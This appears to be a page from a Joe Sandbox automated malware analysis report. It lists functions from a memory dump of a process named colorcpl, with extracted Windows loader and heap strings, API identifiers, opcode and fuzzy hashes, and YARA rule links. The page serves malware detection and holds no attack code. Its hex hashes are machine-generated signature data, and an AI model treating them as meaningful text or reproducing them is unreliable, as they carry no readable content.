                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                    • API String ID: 0-2283098728
                                                                                                    • Opcode ID: 524ead3e218c95472d64e936130b79b12e0f7a175058149a59fd1207d07637ff
                                                                                                    • Instruction ID: 68d960370034ee5de571b4a5cd43c3b1200342d100a82de65b9cdba473259741
                                                                                                    • Opcode Fuzzy Hash: 524ead3e218c95472d64e936130b79b12e0f7a175058149a59fd1207d07637ff
                                                                                                    • Instruction Fuzzy Hash: 1551C2717013829FD714DF24CC84A29B7A6BF8A364F9C0F2DE4A597395DB30A844CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 1E6DDC32
                                                                                                    • HEAP: , xrefs: 1E6DDC1F
                                                                                                    • HEAP[%wZ]: , xrefs: 1E6DDC12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                    • API String ID: 0-3815128232
                                                                                                    • Opcode ID: 578ed50fcc613ed8d28a287182ddfdc98a1f267bb1070953893db29abe5b291e
                                                                                                    • Instruction ID: 85914a3a99b4eb5869a75ab7c8ec90a1de4ca9bf9f7c577bc288c7c21da57529
                                                                                                    • Opcode Fuzzy Hash: 578ed50fcc613ed8d28a287182ddfdc98a1f267bb1070953893db29abe5b291e
                                                                                                    • Instruction Fuzzy Hash: CF5139751003518EE364EF2AC89077277E6FF66348FC14B5AE4C28B285D275E84ADB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E631B04 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1E68FB63
                                                                                                    • HEAP: , xrefs: 1E68FB58
                                                                                                    • HEAP[%wZ]: , xrefs: 1E68FB4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                    • API String ID: 0-1596344177
                                                                                                    • Opcode ID: 8457ed1b0c4621354dc59f16d2c71233b136333431be6b805af0f83c84fe2f42
                                                                                                    • Instruction ID: 59339ccf5dd1e89e72be33456547de58c42d2d5b36efb8325c06b600677da1d5
                                                                                                    • Opcode Fuzzy Hash: 8457ed1b0c4621354dc59f16d2c71233b136333431be6b805af0f83c84fe2f42
                                                                                                    • Instruction Fuzzy Hash: 2651C030A00256DFDB04CF68C480A69BBF6FF49311FA582A9D8599F246E775ED42CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpAllocateTls, xrefs: 1E6A1B40
                                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 1E6A1B4A
                                                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 1E6A1B39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                    • API String ID: 0-4274184382
                                                                                                    • Opcode ID: 0cf966990117cc72adf1e0638964bc2b77387dc971ecdada431b2a9e73cecb52
                                                                                                    • Instruction ID: 691a476d4da830c70785d952560c70aa1af1537a876a720fb3fa8db260ebfac4
                                                                                                    • Opcode Fuzzy Hash: 0cf966990117cc72adf1e0638964bc2b77387dc971ecdada431b2a9e73cecb52
                                                                                                    • Instruction Fuzzy Hash: 4C417DB5E01645EFDB05CFA9C980BADBBF6FF88310F904619E509A7250E734AD00CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E661607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpInitializeTls, xrefs: 1E6A1A47
                                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 1E6A1A51
                                                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 1E6A1A40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                    • API String ID: 0-931879808
                                                                                                    • Opcode ID: a345dd4e1bfb1878e4110688ba37a9ee9addf12ff1dd1e04065d6120627cd5ca
                                                                                                    • Instruction ID: 0cbb2fb9741ab624fbf02aa55b2a15cb88108a8aa678d524cc98c1ddf8d3fc8d
                                                                                                    • Opcode Fuzzy Hash: a345dd4e1bfb1878e4110688ba37a9ee9addf12ff1dd1e04065d6120627cd5ca
                                                                                                    • Instruction Fuzzy Hash: 83313775A20252EBE7008F45CD84FAA73EDAB88354F810729E50AE7190E770BE408795
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B1ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$AddD
                                                                                                    • API String ID: 0-2525844869
                                                                                                    • Opcode ID: 22e0187b942cceb2947a0e7517f420faae47d3e7ecb824cc5f66ed2687d70bc1
                                                                                                    • Instruction ID: fe27ee940983d9ff6b53ace27f6cb407099b82526977d90f53e2ba2d2d7c2cd4
                                                                                                    • Opcode Fuzzy Hash: 22e0187b942cceb2947a0e7517f420faae47d3e7ecb824cc5f66ed2687d70bc1
                                                                                                    • Instruction Fuzzy Hash: D3A159B2618344AFE314CB54C885BABB7E9FF84704F904B2EF99587250E770E944CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E665CC0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$TargetPath
                                                                                                    • API String ID: 0-4164548946
                                                                                                    • Opcode ID: c78038939c52dc7741cdba64b2cc17e0bbf6cb6f24760b2f3fd82576d51c1e13
                                                                                                    • Instruction ID: ce5a6255f3dbbc0287df7aa90f300ba50b2cc123c85ab180064dec9b1b45b0bc
                                                                                                    • Opcode Fuzzy Hash: c78038939c52dc7741cdba64b2cc17e0bbf6cb6f24760b2f3fd82576d51c1e13
                                                                                                    • Instruction Fuzzy Hash: 1A81EC71D143969FD710CF18C895A5FBBA9BF8A704F818B2EEA559B250D330EC05CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BBC10 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                                                                    • API String ID: 0-4122831824
                                                                                                    • Opcode ID: 82e07b0cd37fd4be1e8751ff8744121d4b03eaff4480c062a0548d474ac0ae67
                                                                                                    • Instruction ID: a079fe92037551c71ce282a506aee36f6fb8768fa6f6cf1d8584af80cbd84c46
                                                                                                    • Opcode Fuzzy Hash: 82e07b0cd37fd4be1e8751ff8744121d4b03eaff4480c062a0548d474ac0ae67
                                                                                                    • Instruction Fuzzy Hash: 58917F756147429FD320CF24C880B9BB7E9EF88754F900B2DE5A6C72A0EB34E945CB56
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6C5DA0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Log$RXACT
                                                                                                    • API String ID: 2994545307-2401810139
                                                                                                    • Opcode ID: c89c3121f905583ed56b9ff1bf60df7fcd7a336c772ae68274d10a80e33ee741
                                                                                                    • Instruction ID: dcc20e79178cb9fd097e5f99aa4f71893a6c22ea2f0582e18b9cf51c995ef476
                                                                                                    • Opcode Fuzzy Hash: c89c3121f905583ed56b9ff1bf60df7fcd7a336c772ae68274d10a80e33ee741
                                                                                                    • Instruction Fuzzy Hash: A97146B5509385AFD311CF64C880E6BBBEDFF88754F804A2AF59497220D731ED048B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E70B9DF Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 1E70BA44
                                                                                                    • RedirectedKey, xrefs: 1E70BA8E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                    • API String ID: 0-1388552009
                                                                                                    • Opcode ID: 63d07b2c5e198f572729029edea294d646418fea3e987585dd299e797b8b3ec9
                                                                                                    • Instruction ID: 069e4aa908bd7d045118fb938efa72d1830adba33529991b2b0c7ce9a4dd0004
                                                                                                    • Opcode Fuzzy Hash: 63d07b2c5e198f572729029edea294d646418fea3e987585dd299e797b8b3ec9
                                                                                                    • Instruction Fuzzy Hash: 3C61F575C0022DEBEB11DF95C888AEEBFB9FF09714F50416AE406A7214DB35AA45CF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E64F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$$
                                                                                                    • API String ID: 0-233714265
                                                                                                    • Opcode ID: 2d511efb4825419746551b55639356ce9a592fedca96828e6014352d8433030f
                                                                                                    • Instruction ID: bc6a0de382673f97997aa8ec32ece2b5b709c980dc2f57ae8bfd4757031acaa8
                                                                                                    • Opcode Fuzzy Hash: 2d511efb4825419746551b55639356ce9a592fedca96828e6014352d8433030f
                                                                                                    • Instruction Fuzzy Hash: AF61DE75E0178ADFDB20CFA4C588B9DB7B2FF08314FA05A29D515AB680CB34B981CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6359C0 Relevance: 1.7, Strings: 1, Instructions: 494COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 2a03949251ece645b27d92e37f06fefd97362f5f0f65b32486b964776283f065
                                                                                                    • Instruction ID: 05e2e85b19b1e707e0fb7dc6445c7599e9bfdd933901853d359f4a81efb86426
                                                                                                    • Opcode Fuzzy Hash: 2a03949251ece645b27d92e37f06fefd97362f5f0f65b32486b964776283f065
                                                                                                    • Instruction Fuzzy Hash: C5326770D002AADFDB21CF64C984BDDBBB1BB09305FA046EAD45DA7281D7746A84DF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62B991 Relevance: 1.7, APIs: 1, Instructions: 172COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _vswprintf_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 677850445-0
                                                                                                    • Opcode ID: 885b0d735b95200974fabfe3d45b3e610a8daeb0c833ab1497e59e00e42fd1e3
                                                                                                    • Instruction ID: e88449f05e7a19916499e578def6badd0f0527916ee75ff1e9b69e2d6b1e1b14
                                                                                                    • Opcode Fuzzy Hash: 885b0d735b95200974fabfe3d45b3e610a8daeb0c833ab1497e59e00e42fd1e3
                                                                                                    • Instruction Fuzzy Hash: 9661D175D103998EEB20CF64C844FAEBBB5EF16320F9043ADD899AB281D7755941CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6378D9 Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E637932
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 885266447-0
                                                                                                    • Opcode ID: 07c6eaeab19b42d75ca3b607a3e5ab1245a67aee0822ddc89e908a07f1081892
                                                                                                    • Instruction ID: 1dd0ceb2723f0397edee848b2af72bbc506f46e4ff7c7197ae232911aa43c859
                                                                                                    • Opcode Fuzzy Hash: 07c6eaeab19b42d75ca3b607a3e5ab1245a67aee0822ddc89e908a07f1081892
                                                                                                    • Instruction Fuzzy Hash: 31515870A18382CFD310CF69C590A1BBBE6FB89710FA14A6EF59997354D734E944CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03a70382ef979194e6a18fe0691506d0b0beee523617d30fbea88bdf74db8dca
                                                                                                    • Instruction ID: 01df17635d966e5af9e367c5a6ddbb3efd4dcb4554f7fae0fe134ed7abe486af
                                                                                                    • Opcode Fuzzy Hash: 03a70382ef979194e6a18fe0691506d0b0beee523617d30fbea88bdf74db8dca
                                                                                                    • Instruction Fuzzy Hash: 99416DB4D11299EFDB10CFA9C980AADBBF9FB49700F90866ED458E7211D730A941CF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6E1AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: b7a534645cd4d4a092897a1b4adec7c09bb143d4bc805a06e68cde09c6128791
                                                                                                    • Instruction ID: b347c080c6860fe3892646a0da81a828b93044feaf684454fad4a99ff2cece4c
                                                                                                    • Opcode Fuzzy Hash: b7a534645cd4d4a092897a1b4adec7c09bb143d4bc805a06e68cde09c6128791
                                                                                                    • Instruction Fuzzy Hash: A3E1AE74D012A9CBDB20CFA9C4506EDB7F2FF45700F90825AE895EB694D7749C82EB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6DDEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • System Volume Information, xrefs: 1E6DDEBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: System Volume Information
                                                                                                    • API String ID: 2994545307-764423717
                                                                                                    • Opcode ID: 080db077a6aaf0b1226b74346187db23fa15d64eb56d82a61fa4c4434f829b58
                                                                                                    • Instruction ID: 542c634fdb422ae133ac7b5da63420130df4055c01fcf840950909a36f10396c
                                                                                                    • Opcode Fuzzy Hash: 080db077a6aaf0b1226b74346187db23fa15d64eb56d82a61fa4c4434f829b58
                                                                                                    • Instruction Fuzzy Hash: E4616775908345ABD311DF54CC80E6BB7E9EF98B44F800A2DF980972A0D774ED58CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                    • Instruction ID: a07f85fafd6451f9e92e18fd33c6922698f4f463296e04c49e7a213990b3da1f
                                                                                                    • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                    • Instruction Fuzzy Hash: 8A618C75D01259AFDB11CFA9C840B9EBBB5FF81B25F640B29E814A7294D7349A00DF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B3CDB Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CWDIllegalInDLLSearch
                                                                                                    • API String ID: 0-473384322
                                                                                                    • Opcode ID: fc8afa662128db0007cc32259bbc1b8a671f3ebcfc817641f776e99e644f7981
                                                                                                    • Instruction ID: 591e4fd21793c7783b7cf249723b07536a2f4383cc9cf8dc552637e96f156c77
                                                                                                    • Opcode Fuzzy Hash: fc8afa662128db0007cc32259bbc1b8a671f3ebcfc817641f776e99e644f7981
                                                                                                    • Instruction Fuzzy Hash: 4451EF76B847529BD311CE55C881B16B7E9EB55720F800B2BFD61D7280D3B0ED06CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E663EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                                                    • Instruction ID: 2e720904986bc0080ae9d7eea5c31a79f0704f5d2fb015844adddbb9bf090b0e
                                                                                                    • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                                                    • Instruction Fuzzy Hash: 35516A755057509FC321CF25C840A6BBBE9FF88B10F408A2EF99587690E7B4E904CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BC3B Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializeProcess
                                                                                                    • API String ID: 0-2689506271
                                                                                                    • Opcode ID: 87e49b853c04e1948df503eb6c195d8f18d514822c2585e3ba73d107e4927dc3
                                                                                                    • Instruction ID: 9aecf804178152ffdc3e531453ebd75e6192a453d362685e002da010ba54aa76
                                                                                                    • Opcode Fuzzy Hash: 87e49b853c04e1948df503eb6c195d8f18d514822c2585e3ba73d107e4927dc3
                                                                                                    • Instruction Fuzzy Hash: 87411772516356AFE311CF50C984A9BB7ECEBC9724F804B2BF19286140D774FA44CB56
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62FF90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E630058
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                    • API String ID: 0-996340685
                                                                                                    • Opcode ID: 4245e5aeae0a177dfe898c22015e120ab36c983f134e609089147ad7bc5e6889
                                                                                                    • Instruction ID: f401ae535008e5bd638df542b941a886294946d1bcd29abed4d265f0b9d6c811
                                                                                                    • Opcode Fuzzy Hash: 4245e5aeae0a177dfe898c22015e120ab36c983f134e609089147ad7bc5e6889
                                                                                                    • Instruction Fuzzy Hash: 24418435A1074A9AC764DFB4C4406EBF7F5FF46301F904A2ED5AAD3240E334A549CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Flst
                                                                                                    • API String ID: 0-2374792617
                                                                                                    • Opcode ID: 4b2ec5b216aac1add49a61ad7e7d77ae3d9f63e039ac6b677d1f18b9083b982f
                                                                                                    • Instruction ID: 2bcefb5fc468b1d9758bc3dded60904c41ccde4a308e8a0e90390e0b85e54c1b
                                                                                                    • Opcode Fuzzy Hash: 4b2ec5b216aac1add49a61ad7e7d77ae3d9f63e039ac6b677d1f18b9083b982f
                                                                                                    • Instruction Fuzzy Hash: 1D41A9B1A55301DFD304CF19C180A16FFE5EF8A714F90866EE5598F281DB31E942CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E629730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L4CwL4Cw
                                                                                                    • API String ID: 0-1654103815
                                                                                                    • Opcode ID: f5c0e2d853ed34c50e9d6132bb8485bf38b20c42878881154189bc029c9e54d2
                                                                                                    • Instruction ID: 20cfeab92dafbafb98cfd80d01d1f18a762c5bf9edc90f663a4fec0c62ede503
                                                                                                    • Opcode Fuzzy Hash: f5c0e2d853ed34c50e9d6132bb8485bf38b20c42878881154189bc029c9e54d2
                                                                                                    • Instruction Fuzzy Hash: FF21D03A901656ABD7228F598800B5A7BB5FFC4BA0FD90A39E9959B350D730E801CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6F16CC Relevance: .6, Instructions: 571COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
